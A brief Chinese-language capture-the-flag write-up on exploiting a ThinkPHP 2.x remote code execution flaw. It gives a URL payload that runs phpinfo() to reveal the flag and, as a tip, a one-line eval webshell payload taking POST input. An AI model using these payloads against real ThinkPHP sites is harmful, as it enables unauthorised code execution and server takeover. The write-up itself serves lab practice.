[ThinkPHP]2-Rce 1

[ThinkPHP]2-Rce 1

啟動例項發現是一個ThinkPHP的示例程式碼，根據題目判斷這題為RCE

掃描器掃描，未發現存在的REC漏洞（根據題目以及掃描結果猜想，可能是2.x版本的rec）

構造payload,成功顯示phpinfo頁面

?s=/index/index/name/${phpinfo()}

唱跳rap籃球+F，直接找到flag

tips.有時候在phpinfo找不到，可以採用一句話木馬形式

?s=/index/index/name/${@eval($_POST[123456])}